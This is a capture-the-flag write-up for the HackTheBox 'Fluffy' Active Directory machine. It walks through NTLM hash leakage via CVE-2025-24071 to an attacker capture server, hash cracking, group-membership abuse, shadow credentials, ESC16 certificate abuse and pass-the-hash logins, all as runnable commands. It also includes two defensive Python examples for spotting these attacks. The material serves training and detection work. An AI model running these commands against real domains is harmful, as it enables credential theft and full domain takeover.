Cybersecurity, HackTheBox, Enumeration, Privilege Escalation, Active Directory, Windows

HackTheBox | Fluffy [Easy] Writeup

Author

robeeds


Machine Information

As is common in real life Windows pentests, you will start the Fluffy box with credentials for the following account: j.fleischman / J0elTHEM4n1990!

IP Address: 10.10.11.69


Guide:

Initial Setup

Just like any other HTB challenge, it is a good idea to make sure that your pentesting environment is up to date. 

sudo apt-get update && sudo apt-get upgrade

Edit the hosts file

sudo vim /etc/hosts

Add the following entry

10.10.11.69 fluffy.htb


Nmap Scan

Run an Nmap scan of your preference, or use the following (quick scan):

sudo nmap 10.10.11.69 -sS -sV

After a few minutes, the scan results in the following:

[Image: Nmap results for the Fluffy machine]

From the results, we can see two notable services:
- LDAP (port 389), which is Active Directory's directory service
- SMB (ports 139/445)


SMB Enumeration

From the machine information, use the credentials (j.fleischman / J0elTHEM4n1990!) to list the available SMB shares:

smbclient -U 'j.fleischman' --password='J0elTHEM4n1990!' -L '\\10.10.11.69'

We receive the following:

[Image: SMB shares listed by smbclient]

From the results, we can see that there is an IT share. Given the context of the machine information, we might be able to assume that j.fleischman may be part of the IT department in this organization.


Connect to the IT share

smbclient -U 'j.fleischman' --password='J0elTHEM4n1990!' '\\10.10.11.69\IT'

After gaining a successful connection and listing the files in the current directory, we see the following:

[Image: Contents of the IT share in smbclient]

There is a file named Upgrade_Notice.pdf.

Download this file:

get Upgrade_Notice.pdf


Opening a new terminal tab, going to the directory that now holds Upgrade_Notice.pdf and running exiftool on it, we can view metadata that may give us useful information later down the road.

[Image: exiftool output on Upgrade_Notice.pdf]

We can see that the author of the document is p.agila, most likely an important figure in the IT department.


Viewing the PDF file, we can see that it lists Common Vulnerabilities and Exposures (CVEs) that may apply to the target machine.

[Image: CVE list from Upgrade_Notice.pdf]

Doing some research on these CVEs and looking for proofs of concept, one stands out the most:

CVE-2025-24071


Executing Our First Exploit

Reference: GitHub


Clone the repository

git clone https://github.com/FOLKS-IWD/CVE-2025-24071-msfvenom.git
cd CVE-2025-24071-msfvenom

Copy the module into the Metasploit modules directory

cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/

Load msfconsole and the module

msfconsole
use auxiliary/server/ntlm_hash_leak

Set the required variables

set ATTACKER_IP <YOUR_IP_ADDRESS>
set FILENAME exploit.zip
set LIBRARY_NAME malicious.library-ms
set SHARE_NAME IT

Run the module

run


Additionally, run Metasploit's SMB capture module

use auxiliary/server/capture/smb
set SRVHOST <YOUR_IP_ADDRESS>
run


Upload the generated file to the IT share (in my case, I named it cvexploit.zip).

[Image: Upload of cvexploit.zip to the IT share]


After a few seconds, we see that p.agila's NetNTLMv2 challenge-response hashes are leaked to our capture server.

[Image: p.agila's NetNTLMv2 hashes captured in msfconsole]


Copy and paste one of the hashes into a file, to crack later.

echo 'p.agila::FLUFFY:a4e506413250307f:ce0e18643b435b0148483a0d76de1307:010100000000000080be16f213dbdb0146766e9df33f2785000000000200120057004f0052004b00470052004f00550050000100120057004f0052004b00470052004f00550050000400120057004f0052004b00470052004f00550050000300120057004f0052004b00470052004f00550050000700080080be16f213dbdb0106000400020000000800300030000000000000000100000000200000ee673f1e7cf7d3ee14e059db2c06e3699e0c70ef3824cdb46a2d41fc2f1eee6f0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e060360038000000000000000000' > p.agila_hash


Run hashcat (mode 5600, NetNTLMv2) on the file:

hashcat -m 5600 p.agila_hash /usr/share/wordlists/rockyou.txt --force


We get the following credentials!

p.agila:prometheusx-303
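The captured line above is a NetNTLMv2 challenge-response in hashcat's -m 5600 format; its long last field is the client's NTLMv2 blob, which carries a timestamp and the AV_PAIR target information the client was handed. The parser below is an added example, not part of the original writeup: it decodes those fields from a constructed sample line (account, challenges and the cifs/10.10.16.5 SPN are invented), and shows how the decoded TargetName reveals that the victim authenticated to a host outside the domain, which is the signal a defender looks for in such a capture.

```python
import struct
from datetime import datetime, timedelta, timezone

# AV_PAIR ids from MS-NLMP 2.2.2.1 that a capture normally carries.
AV_NAMES = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName",
            4: "DnsDomainName", 5: "DnsTreeName", 7: "Timestamp", 9: "TargetName"}

def filetime_to_dt(ft):
    # Windows FILETIME: 100 ns ticks since 1601-01-01 UTC
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)

def parse_netntlmv2(line):
    """Split a hashcat -m 5600 line and decode the AV_PAIRs of its NTLMv2 blob."""
    user, _, domain, server_chal, proof, blob_hex = line.strip().split(":")
    blob = bytes.fromhex(blob_hex)
    if len(blob) < 28 or blob[:2] != b"\x01\x01":
        raise ValueError("not an NTLMv2_CLIENT_CHALLENGE blob")
    ts, client_chal = struct.unpack_from("<Q8s", blob, 8)   # timestamp @8, challenge @16
    info, pos = {}, 28                                      # AV_PAIR list starts at 28
    while pos + 4 <= len(blob):
        av_id, av_len = struct.unpack_from("<HH", blob, pos)
        pos += 4
        if av_id == 0:                                      # MsvAvEOL ends the list
            break
        value, pos = blob[pos:pos + av_len], pos + av_len
        if av_id == 7:
            info["Timestamp"] = filetime_to_dt(struct.unpack("<Q", value)[0]).isoformat()
        elif av_id in AV_NAMES:
            info[AV_NAMES[av_id]] = value.decode("utf-16-le")
    return {"user": user, "domain": domain, "server_challenge": server_chal,
            "ntproofstr": proof, "client_challenge": client_chal.hex(),
            "client_timestamp": filetime_to_dt(ts).isoformat(), "target_info": info}

def unexpected_target(parsed, known_hosts):
    """True when the TargetName SPN names a host that is not a known domain host."""
    spn = parsed["target_info"].get("TargetName", "")
    host = spn.split("/", 1)[1] if "/" in spn else spn
    return host.lower() not in known_hosts

def _av(av_id, value):   # one AV_PAIR: id, length, value
    return struct.pack("<HH", av_id, len(value)) + value

# Constructed sample (not the box's capture): a FLUFFY user answering a WORKGROUP host reached as cifs/10.10.16.5.
FILETIME_2025 = 133801632000000000                          # 2025-01-01T00:00:00Z
_u16 = lambda s: s.encode("utf-16-le")
_blob = (b"\x01\x01" + bytes(6) + struct.pack("<Q", FILETIME_2025) + bytes(8) + bytes(4)
         + _av(2, _u16("WORKGROUP")) + _av(1, _u16("WORKGROUP"))
         + _av(7, struct.pack("<Q", FILETIME_2025)) + _av(9, _u16("cifs/10.10.16.5"))
         + _av(0, b"") + bytes(4))
SAMPLE = "p.agila::FLUFFY:" + "11" * 8 + ":" + "22" * 16 + ":" + _blob.hex()
```

In a real capture the NbDomainName of WORKGROUP and a TargetName SPN pointing at a non-domain address are exactly what distinguishes coerced authentication to a rogue server from normal SMB traffic.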


Enumerating Active Directory

Now that we've gained a basic foothold with another user's account, we can use BloodHound to analyze AD rights and relations, particularly the ones that we might be able to abuse.


Run neo4j

sudo neo4j start

Run bloodhound

sudo bloodhound


Log into BloodHound with your credentials. If you haven't set up BloodHound previously, refer to the Kali documentation.


Gather data for BloodHound

bloodhound-python -d fluffy.htb -u p.agila -p prometheusx-303 -ns 10.10.11.69 -c ALL


There will be a set of .json files in your directory. Upload them to BloodHound.


In BloodHound, we have the option to analyze the path from p.agila to high value targets, which displays the following node:

[Image: BloodHound path analysis from p.agila]


If we look closely, p.agila is a member of the Service Account Managers group. This group has GenericAll rights over the Service Accounts group, which contains the following:
- CA_SVC (Active Directory Certificate Authority)
- LDAP_SVC (Lightweight Directory Access Protocol)
- WINRM_SVC (Windows Remote Management)


Privilege Escalation


In theory, with p.agila having control over the aforementioned service accounts, we could log in remotely to the target machine (winrm_svc), and maybe even use the Active Directory Certificate Authority (ca_svc) to impersonate other users.

To execute this, we can use BloodyAD to perform privilege escalation.


First, let's see what our group membership is under p.agila

bloodyAD --host 10.10.11.69 -d fluffy.htb -u p.agila -p prometheusx-303 get membership p.agila

Results:

[Image: p.agila's group membership as reported by bloodyAD]


Since p.agila is not a part of the Service Accounts group, we will need to add ourselves to this group.

bloodyAD --host 10.10.11.69 -d fluffy.htb -u p.agila -p prometheusx-303 add groupMember 'Service Accounts' p.agila

We receive the output '[+] p.agila added to Service Accounts', indicating that we are now able to continue.


Recalling that the Service Accounts group has GenericWrite permissions over the service account domain users, we can check possible abuse paths in BloodHound.

Referring back to our BloodHound diagram, clicking on the GenericWrite relation shows the available abuse information:

[Image: BloodHound abuse info for the GenericWrite relation]

The shadow credentials attack listed there aligns with our earlier idea of impersonating other users.


Here, we can use Certipy's shadow command, which uses p.agila's GenericWrite right to add a key credential to WINRM_SVC, authenticates with the resulting certificate, and retrieves that account's NT hash.

certipy shadow auto -username 'p.agila@fluffy.htb' -p 'prometheusx-303' -account winrm_svc

This gives us the following output:

[Image: Certipy retrieving the NT hash of winrm_svc]


We can now use this hash to log in to the target machine remotely, as WINRM_SVC.

One tool we can use to do this is Evil-WinRM.

evil-winrm -i 10.10.11.69 -u winrm_svc -H <HASH>

This provides us a remote connection to the target machine, and now we are able to navigate the machine as an actual user.

[Image: Evil-WinRM session as winrm_svc with the user flag]

Navigating to the Desktop directory, we find the user flag, which we can view with cat:

cat user.txt


Further Privilege Escalation

Now that we have the user flag, it's time to go for root. Looking back on how we have GenericWrite permission over the service account users, we might be able to further escalate our privileges through CA_SVC.


Context

The Certificate Authority is responsible for verifying the identity of users, computers, and organizations. Certificate templates simplify administering an AD CS certification authority: each template is a rule set applied to incoming certificate requests. If these templates (or the CA itself) are misconfigured, an attacker can potentially use that to gain greater privileges in the target environment.


Certipy can be used to find misconfigurations in these templates, but before we do that, let's shadow CA_SVC's credentials the same way, this time using winrm_svc's hash:

certipy shadow auto -username 'winrm_svc@fluffy.htb' -hashes <WINRM_HASH> -account ca_svc

[Image: Certipy shadow results for ca_svc]


After getting the hash for CA_SVC, we now search for misconfigurations in the certificate templates.

certipy find -u 'ca_svc@fluffy.htb' -hashes <CA_SVC HASH> -dc-ip '10.10.11.69' -text -enabled -hide-admins


Certipy writes its output to a file; open that file and look for any flagged vulnerabilities.

[Image: Certipy output flagging ESC16 for ca_svc]

We see the following vulnerability:
ESC16: Security Extension disabled

ESC16 means the CA has the szOID_NTDS_CA_SECURITY_EXT (SID) security extension disabled, so the certificates it issues carry no SID binding and the domain controller falls back to mapping them by the UPN in the certificate. That is why changing ca_svc's UPN to Administrator in the steps below yields a certificate that authenticates as Administrator.


Certipy's documentation shows how to exploit this.

Steps:

1. Read the initial UPN of the victim account

certipy account -u 'ca_svc@fluffy.htb' -hashes <CA_SVC HASH> -dc-ip '10.10.11.69' -user 'ca_svc' read

We get the following attributes:

[Image: ca_svc account attributes read by Certipy]


2. Update the UPN of the victim account

certipy account -u 'ca_svc@fluffy.htb' -hashes <CA_SVC HASH> -dc-ip '10.10.11.69' -upn 'Administrator' -user 'ca_svc' update

[Image: ca_svc UPN updated to Administrator]


3. Request the certificate for the administrator account

certipy req -u 'Administrator' -hashes <CA_SVC HASH> -target 'DC01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'

[Image: Certificate requested for Administrator, saved as administrator.pfx]


4. Restore the UPN of victim account

certipy account -u 'ca_svc@fluffy.htb' -hashes <CA_SVC HASH> -dc-ip '10.10.11.69' -upn 'ca_svc' -user 'ca_svc' update


Authenticate as Admin

certipy auth -dc-ip '10.10.11.69' -pfx 'administrator.pfx' -username 'Administrator' -domain 'fluffy.htb'

[Image: Certipy returning the Administrator NT hash]
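Each step of the escalation above leaves a Security event on the domain controller: adding p.agila to Service Accounts is logged as event 4728 (member added to a security-enabled global group), while the key-credential write behind the shadow credentials step and the userPrincipalName change in the ESC16 steps both appear as event 5136 (directory service object modified). The triage below is an added example that is not from the writeup: it runs three rules over constructed event records (keys follow the EventData field names; every value is invented) and flags the pattern used against Service Accounts, winrm_svc and ca_svc.

```python
WATCHED_GROUPS = {"Service Accounts", "Service Account Managers", "Domain Admins"}
# sAMAccountNames the UPN rule compares against (constructed list for this domain).
KNOWN_ACCOUNTS = {"administrator", "p.agila", "j.fleischman", "ca_svc", "winrm_svc", "ldap_svc"}
VALUE_ADDED = "%%14674"   # 5136 OperationType for "Value Added" (%%14675 is "Value Deleted")

def object_cn(dn):
    """First RDN value of a DN, lower-cased: CN=ca_svc,CN=Users,... -> ca_svc."""
    return dn.split(",", 1)[0].split("=", 1)[1].lower()

def triage(ev):
    """Return an alert string for one event, or None when no rule matches."""
    who = ev["SubjectUserName"]
    if ev["EventID"] == 4728 and ev["TargetUserName"] in WATCHED_GROUPS:
        return f"group-add: {who} added {object_cn(ev['MemberName'])} to {ev['TargetUserName']}"
    if ev["EventID"] == 5136 and ev["OperationType"] == VALUE_ADDED:
        attr, target = ev["AttributeLDAPDisplayName"], object_cn(ev["ObjectDN"])
        # A key credential written by anyone other than the account itself is the
        # shadow-credentials pattern (self-writes come from Windows Hello enrolment).
        if attr == "msDS-KeyCredentialLink" and who.lower() != target:
            return f"shadow-credentials: {who} wrote a key credential on {target}"
        # A UPN whose prefix is another existing account's name is the ESC16 setup step.
        if attr == "userPrincipalName":
            prefix = ev["AttributeValue"].split("@", 1)[0].lower()
            if prefix != target and prefix in KNOWN_ACCOUNTS:
                return f"upn-hijack: {target} now carries UPN {ev['AttributeValue']}"
    return None

def alerts(events):
    return [a for a in map(triage, events) if a]

# Constructed Security events (invented values; keys follow the EventData names).
DN = "CN={},CN=Users,DC=fluffy,DC=htb".format
EVENTS = [
    {"EventID": 4728, "SubjectUserName": "p.agila", "MemberName": DN("p.agila"),
     "TargetUserName": "Service Accounts"},
    {"EventID": 5136, "SubjectUserName": "p.agila", "ObjectDN": DN("winrm_svc"),
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": VALUE_ADDED,
     "AttributeValue": "(constructed KeyCredential DN-binary blob)"},
    {"EventID": 5136, "SubjectUserName": "ca_svc", "ObjectDN": DN("ca_svc"),
     "AttributeLDAPDisplayName": "userPrincipalName", "OperationType": VALUE_ADDED,
     "AttributeValue": "Administrator"},
    {"EventID": 5136, "SubjectUserName": "ca_svc", "ObjectDN": DN("ca_svc"),   # UPN restored
     "AttributeLDAPDisplayName": "userPrincipalName", "OperationType": VALUE_ADDED,
     "AttributeValue": "ca_svc@fluffy.htb"},
    {"EventID": 4728, "SubjectUserName": "Administrator", "MemberName": DN("j.fleischman"),
     "TargetUserName": "Helpdesk"},                                             # not watched
]
```

Event 5136 is only generated when Directory Service Changes auditing is enabled and the user objects carry a matching SACL, so the two 5136 rules are silent on a domain that has not turned that on.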


Using the hash of the admin, log in through Evil-WinRM

evil-winrm -i 10.10.11.69 -u Administrator -H <ADMIN_HASH>

[Image: Evil-WinRM session as Administrator]


Now that we are logged in as the Administrator, navigate around to find the root flag:

[Image: Root flag on the Administrator's desktop]

cat root.txt


We have successfully rooted Fluffy!